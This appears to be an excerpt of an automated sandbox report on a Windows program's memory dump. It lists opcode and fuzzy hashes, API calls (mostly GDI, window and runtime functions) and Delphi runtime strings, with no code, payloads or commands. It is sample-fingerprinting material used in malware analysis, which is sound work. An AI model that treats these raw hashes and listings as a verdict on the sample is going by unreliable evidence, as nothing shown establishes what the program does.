API ID: FindResource String ID: API String ID: 1635176832-0 Opcode ID: a7aec1380e3d9a44d41655342542711cdc239b8c89b4bb93b6751c41b9ee953d Instruction ID: a558194f10a0a9e1eab8edb9af3e5f6f08f247af85dfe8eb6ef2f7f974685de1 Opcode Fuzzy Hash: a7aec1380e3d9a44d41655342542711cdc239b8c89b4bb93b6751c41b9ee953d Instruction Fuzzy Hash: 3C012B713053006FE701EF6AFC92A9AB7EDDB89758752403BF500D7381DA799C119628

Uniqueness

Uniqueness Score: -1.00%

APIs

GetLocalTime.KERNEL32 ref: 0040A3A0

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalTime String ID: API String ID: 481472006-0 Opcode ID: bc832ecf7cc96618231744286af82f2a96bac6a6e48927af04e7672a28d8f280 Instruction ID: c54d32061ce5158e0c09fff7559f7545f9b77a206da0589db231419da80a1d6b Opcode Fuzzy Hash: bc832ecf7cc96618231744286af82f2a96bac6a6e48927af04e7672a28d8f280 Instruction Fuzzy Hash: ECA0120040482001C54033190C0313530445801630FC4475578F9602D1E92E4130809B

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847 Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847 Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

APIs

GetWindowLongA.USER32 ref: 0042E263 GetWindowRect.USER32 ref: 0042E27E OffsetRect.USER32(?,?,?), ref: 0042E293 GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E2A1 GetWindowLongA.USER32 ref: 0042E2D2 GetSystemMetrics.USER32 ref: 0042E2E7 GetSystemMetrics.USER32 ref: 0042E2F0 InflateRect.USER32(?,000000FE,000000FE), ref: 0042E2FF GetSysColorBrush.USER32(0000000F), ref: 0042E32C FillRect.USER32 ref: 0042E33A ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042E3A3,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E35F ReleaseDC.USER32 ref: 0042E39D

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease String ID: API String ID: 19621357-0 Opcode ID: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3 Instruction ID: 957c21c96a165308dc8ebfbd5cc34ddb946f70638fe63c8bb3f5cff5665369c4 Opcode Fuzzy Hash: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3 Instruction Fuzzy Hash: 71413371E04119ABDB00EBA9DD42EDFB7BDEF49314F500166F914F7281CA79AE018764

Uniqueness

Uniqueness Score: -1.00%

APIs

MessageBoxA.USER32 ref: 004029CA

Strings

7 , xrefs: 0040279D The unexpected small block leaks are: , xrefs: 00402803 The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945 Unknown , xrefs: 00402888 Unexpected Memory Leak , xrefs: 004029BC String , xrefs: 0040289D bytes: , xrefs: 00402859 , xrefs: 00402910 An unexpected memory leak has occurred. , xrefs: 0040278C

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown API String ID: 2030045667-32948583 Opcode ID: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1 Instruction ID: 23a8accc11e2490a14215b8d9e6836f2a0164065a38b33aa7325ad77d19b5dc4 Opcode Fuzzy Hash: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1 Instruction Fuzzy Hash: 14A1D930B042548BDF21AA2DC988BD976E5EB09314F1441FAE449BB3C2DBFD89C5CB59

Uniqueness

Uniqueness Score: -1.00%

APIs

GetDC.USER32(00000000), ref: 004403EB CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044040F ReleaseDC.USER32 ref: 0044041A CreateCompatibleDC.GDI32(00000000), ref: 00440421 SelectObject.GDI32(00000000,?), ref: 00440431 BeginPaint.USER32(00000000,?,00000000,004404F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00440453 BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 004404AF EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004404C0 SelectObject.GDI32(00000000,?), ref: 004404DA DeleteDC.GDI32(00000000), ref: 004404E3 DeleteObject.GDI32(?), ref: 004404EC Part of subcall function 0043FDA8: BeginPaint.USER32(00000000,?), ref: 0043FDD3 Part of subcall function 0043FDA8: EndPaint.USER32(00000000,?,0043FF0E), ref: 0043FF01

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease String ID: API String ID: 3867285559-0 Opcode ID: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770 Instruction ID: 4919ca747627bef7842d7ed575d7896ae0b3c9884536c9da749fdf441052b200 Opcode Fuzzy Hash: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770 Instruction Fuzzy Hash: C1414171B00204AFDB10EFA9CD85F9EB7F8EF49704F10447ABA05EB281DA789D158B54

Uniqueness

Uniqueness Score: -1.00%

APIs

Part of subcall function 0040BECC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040BEE9 Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040BF0D Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040BF28 Part of subcall function 0040BECC: LoadStringA.USER32 ref: 0040BFBE CharToOemA.USER32 ref: 0040C08B GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040C0A8 WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0AE GetStdHandle.KERNEL32(000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C3 WriteFile.KERNEL32(00000000,000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C9 LoadStringA.USER32 ref: 0040C0EB MessageBoxA.USER32 ref: 0040C101

Strings

,v@ , xrefs: 0040C0D7 L0F , xrefs: 0040C068

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual String ID: ,v@$L0F API String ID: 185507032-114336920 Opcode ID: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e Instruction ID: 968c3332249ca419ab36ba5ff9e4d5e5c4f2a2f71d5e9e194e9044cb27fed959 Opcode Fuzzy Hash: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e Instruction Fuzzy Hash: F61154B1148204BAD200EB95CC86F8B77EC9B44704F40453BB755FA1D3DAB9E94487AB

Uniqueness

Uniqueness Score: -1.00%

Strings

7 , xrefs: 0040279D The unexpected small block leaks are: , xrefs: 00402803 The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945 Unexpected Memory Leak , xrefs: 004029BC bytes: , xrefs: 00402859 , xrefs: 00402910 An unexpected memory leak has occurred. , xrefs: 0040278C

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak API String ID: 0-2723507874 Opcode ID: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165 Instruction ID: 232ad5794996384582659ab8687426251ae0ce960e01d4fcfe06ac857680b770 Opcode Fuzzy Hash: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165 Instruction Fuzzy Hash: E771C630B042588FDB21AA2DC988BD9B6E5EB09704F1441FBE049F73C2DBB949C5CB59

Uniqueness

Uniqueness Score: -1.00%

APIs

MulDiv.KERNEL32(?,?,?), ref: 0043A65F MulDiv.KERNEL32(?,?,?), ref: 0043A679 MulDiv.KERNEL32(?,?,?), ref: 0043A6A7 MulDiv.KERNEL32(?,?,?), ref: 0043A6BD MulDiv.KERNEL32(?,?,?), ref: 0043A6F5 MulDiv.KERNEL32(?,?,?), ref: 0043A70D Part of subcall function 00425C10: MulDiv.KERNEL32(00000000,00000048,?), ref: 00425C21 MulDiv.KERNEL32(?), ref: 0043A764 MulDiv.KERNEL32(?), ref: 0043A78E MulDiv.KERNEL32(00000000), ref: 0043A7B4 Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80 Instruction ID: 31ea7b08f01d562e4291b2201e28d04268924927301679854e288b517f7f1c2d Opcode Fuzzy Hash: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80 Instruction Fuzzy Hash: FA513370644750AFC320EB69C885E6BB7F9AF49744F08581EF5D6C7361C739E8608B1A

Uniqueness

Uniqueness Score: -1.00%

APIs

GetCurrentThreadId.KERNEL32 ref: 00420497 GetCurrentThreadId.KERNEL32 ref: 004204A6 Part of subcall function 00420464: ResetEvent.KERNEL32(00000260,004204E1,?,?,00000000), ref: 0042046A EnterCriticalSection.KERNEL32(004662E8,?,?,00000000), ref: 004204EB InterlockedExchange.KERNEL32(00461BEC,?), ref: 00420507 LeaveCriticalSection.KERNEL32(004662E8,00000000,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 00420560 EnterCriticalSection.KERNEL32(004662E8,004205DC,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 004205CF

Strings

40F , xrefs: 0042049C

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset String ID: 40F API String ID: 2189153385-2631550472 Opcode ID: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7 Instruction ID: ef1ed86c35f2a73ab8eb88fda658a997fa2195ff33e20d550fe0e6f0303cdae6 Opcode Fuzzy Hash: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7 Instruction Fuzzy Hash: DC31D330B04714BFD701EF65E851A6ABBE8EB49704FA184BBF400E2692D77C9850CE2D

Uniqueness

Uniqueness Score: -1.00%

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56,?,0044C980), ref: 004045F5 WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56), ref: 004045FB GetStdHandle.KERNEL32(000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404610 WriteFile.KERNEL32(00000000,000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404616 MessageBoxA.USER32 ref: 00404634

Strings

Error , xrefs: 00404628 Runtime error at 00000000 , xrefs: 004045EE, 0040462D

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message String ID: Error$Runtime error at 00000000 API String ID: 1570097196-2970929446 Opcode ID: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7 Instruction ID: 95cfc67e252f177aabf72d71697ea3d849ed0d739da66028a04d1f7d325712f5 Opcode Fuzzy Hash: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7 Instruction Fuzzy Hash: 2CF062A06803C475EA10B7655D46F9622484785F1AF2446BFF310F40F2BAFC89C49B2F

Uniqueness

Uniqueness Score: -1.00%

APIs

SaveDC.GDI32(?), ref: 0044022D Part of subcall function 00439028: GetWindowOrgEx.GDI32(00000000), ref: 00439036 Part of subcall function 00439028: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0043904C IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440266 GetWindowLongA.USER32 ref: 0044027A GetWindowLongA.USER32 ref: 0044029B SetRect.USER32 ref: 004402CB DrawEdge.USER32(?,?,00000000,00000000), ref: 004402DA IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440303 RestoreDC.GDI32(?,?), ref: 00440382

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave String ID: API String ID: 2976466617-0 Opcode ID: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01 Instruction ID: 4aa519c723c9a553b380c3e93beb146f7b5c6051756f74ab7ed9f7139ab4c4a9 Opcode Fuzzy Hash: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01 Instruction Fuzzy Hash: D341FC75A00208AFEB10DFD9C985F9EB7F9EF48304F1141A5BA04EB391D678AE41CB54

Uniqueness

Uniqueness Score: -1.00%

APIs

GetMenu.USER32(00000000), ref: 004506A0 SetMenu.USER32(00000000,00000000), ref: 004506BD SetMenu.USER32(00000000,00000000), ref: 004506F2 SetMenu.USER32(00000000,00000000,00000000,00450790), ref: 0045070E Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772 SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00450755

Strings

(7B , xrefs: 004505EC

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadStringWindow String ID: (7B API String ID: 1738039741-3251261122 Opcode ID: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc Instruction ID: 391e45c69739de599930f1571a303692f4f31b01482e4dca29fa4868e8c2a8c8 Opcode Fuzzy Hash: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc Instruction Fuzzy Hash: F151AE34A043445BEB24EF39998675B2694AB8430AF0544BFFC059B397CABCDC498B99

Uniqueness

Uniqueness Score: -1.00%

APIs

Part of subcall function 004273B0: GetObjectA.GDI32(?,00000004), ref: 004273C7 Part of subcall function 004273B0: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 004273EA GetDC.USER32(00000000), ref: 004285C6 CreateCompatibleDC.GDI32(?), ref: 004285D2 SelectObject.GDI32(?), ref: 004285DF SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428637,?,?,?,?,00000000), ref: 00428603 SelectObject.GDI32(?,?), ref: 0042861D DeleteDC.GDI32(?), ref: 00428626 ReleaseDC.USER32 ref: 00428631

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable String ID: API String ID: 4046155103-0 Opcode ID: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c Instruction ID: fc760d696f5b6bfeae7a67bf9a168a54974abfe34dfe22b54ea61c4cebc6b826 Opcode Fuzzy Hash: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c Instruction Fuzzy Hash: 72119371E052186BDB10EBE9DC51EAEB3FCEF08704F4144BAB614E7680DA799D508B68

Uniqueness

Uniqueness Score: -1.00%

APIs

DrawEdge.USER32(00000000,?,00000006,?), ref: 004304B3 OffsetRect.USER32(?,00000001,00000001), ref: 00430504 DrawTextA.USER32(00000000,00000000,?,?,?), ref: 0043053D OffsetRect.USER32(?,000000FF,000000FF), ref: 0043054A DrawTextA.USER32(00000000,00000000,?,?,?), ref: 004305B5

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge String ID: API String ID: 3610532707-0 Opcode ID: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54 Instruction ID: 3dcdb83b52eea41a6f7c2ae4f71efb06fc793ff540cda049268810552e419287 Opcode Fuzzy Hash: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54 Instruction Fuzzy Hash: E451B770A00214AFDB10EB69C891B9FB7A5AF08324F55526BF914A7392C77CEE408B59

Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8 Instruction ID: a3695b4b82a7dda22394f8c72c2d1be36efbcd0d540cfdc55166254eebed839c Opcode Fuzzy Hash: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8 Instruction Fuzzy Hash: E511A521B002495ADB20AA7B8929B5B27885F4970CF0422ABBD11A7393CA3CCC09C75C

Uniqueness

Uniqueness Score: -1.00%

APIs

Part of subcall function 0044CBE4: GetActiveWindow.USER32 ref: 0044CBE7 Part of subcall function 0044CBE4: GetCurrentThreadId.KERNEL32 ref: 0044CBFC Part of subcall function 0044CBE4: EnumThreadWindows.USER32(00000000,0044CBC4), ref: 0044CC02 Part of subcall function 00457DC8: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004580D9,00000000,004583B7), ref: 00457DE3 Part of subcall function 00457DC8: GetIconInfo.USER32(00000000,?), ref: 00457DE9 ClientToScreen.USER32(?,?), ref: 00458161 OffsetRect.USER32(?,?,?), ref: 00458178 OffsetRect.USER32(?,?,?), ref: 004582A4 Part of subcall function 00457B58: SetTimer.USER32 ref: 00457B72

Strings

4jC , xrefs: 0045813E

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows String ID: 4jC API String ID: 2591747986-2900625241 Opcode ID: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029 Instruction ID: 3c06f24524cbe1945d16a03846c9b40712580fa28ccc941ba7e8c22a91bf12dc Opcode Fuzzy Hash: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029 Instruction Fuzzy Hash: 27C1E435A00618CFCB10DFA9C494A9EB7F5BF49304F1081AAE905EB366DB34AD4ACF45

Uniqueness

Uniqueness Score: -1.00%

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601 Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

Tv@ , xrefs: 0040C5C8 Lv@ , xrefs: 0040C5B9

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual String ID: Lv@$Tv@ API String ID: 902310565-3490928387 Opcode ID: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc Instruction ID: c01818685c40b8fea18ad10fd3e77254e6e7d063cfafddee118467fe47f8fec1 Opcode Fuzzy Hash: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc Instruction Fuzzy Hash: 30413670900668DFDB61DF64CC84BDAB7F5AB49304F4040EAE508AB391D7B8AE84CF95

Uniqueness

Uniqueness Score: -1.00%

Strings

ExplicitLeft , xrefs: 0043C3A6 ExplicitTop , xrefs: 0043C3DE IsControl , xrefs: 0043C36E ExplicitWidth , xrefs: 0043C416 ExplicitHeight , xrefs: 0043C44E

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: ExplicitHeight$ExplicitLeft$ExplicitTop$ExplicitWidth$IsControl API String ID: 0-1359656977 Opcode ID: e198b18a899ee8fbe602b3c221bc617dfed544fe1bcf56702e28467d685845b1 Instruction ID: cbb0c5206f246dd0b0ff20d4357b65f0a75d08649d638fbcb0a39a926d9dba2b Opcode Fuzzy Hash: e198b18a899ee8fbe602b3c221bc617dfed544fe1bcf56702e28467d685845b1 Instruction Fuzzy Hash: C3314F34640614AFDF14CA58D4D5A7673E8DF1D728F20A09AF801EF386CB28EC019F59

Uniqueness

Uniqueness Score: -1.00%

APIs

GetDesktopWindow.USER32 ref: 00438609 GetDesktopWindow.USER32 ref: 00438739 SetCursor.USER32(00000000), ref: 0043878E Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100 SetCursor.USER32(00000000), ref: 00438779

Memory Dump Source

Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorDesktopWindow$DragImageList_ String ID: API String ID: 617806055-0 Opcode ID: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a Instruction ID: 08362208b1a53e947958c9dd7a602420f7f888ca1ef680945a718b5847218c5a Opcode Fuzzy Hash: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a Instruction Fuzzy Hash: C7915274600240EFC704DF29E986A15B7E1BB48308F15916AF4458B37AEBB8ED45CF6B

Uniqueness

Uniqueness Score: -1.00%

APIs

